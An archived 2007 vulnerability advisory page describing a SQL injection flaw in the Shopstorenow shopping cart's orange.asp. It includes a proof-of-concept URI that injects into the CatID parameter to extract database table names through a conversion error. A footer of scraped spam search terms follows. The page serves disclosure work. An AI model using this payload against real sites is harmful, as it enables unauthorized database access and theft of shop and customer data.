about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Shopstorenow E-commerce Shopping Cart Orange.ASP SQL Injection Vulnerability


Title Shopstorenow E-commerce Shopping Cart Orange.ASP SQL Injection Vulnerability
Published 2007-01-06-12:00AM
Updated 2007-01-08-05:06PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  IbnuSina is credited with the discovery of this vulnerability.
Vulnerable  Shopstorenow Ecommerce Shopping Cart 0
Not Vulnerable  
Code   Attackers can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/orange.asp?CatID=1'%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 20:55:42 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
wap music ANUSKA IME news for c Www.hindi reev 9403449301 trip.lt99. www89.coms kainy.cn mambo Remo senos sex picter kerio arabicwome news+for+c news for c www.trisha www.trisha www.sexho www.emoney cherrytap wwwpornodo Fotos sex lzm.totaob telnet AsIN AsIN bof +www.trish 200 /compo Perawan di www.nbbook WWW.FRESEX www.lianyu bigg flash inje pw dump 2 sams office wor sex.hot.co ms03_039 sex.hot.co php+4.1.1 Asoka ACP+User+R www.world SERX VEDEY Linux 2.6. 58.hlygc.c t666t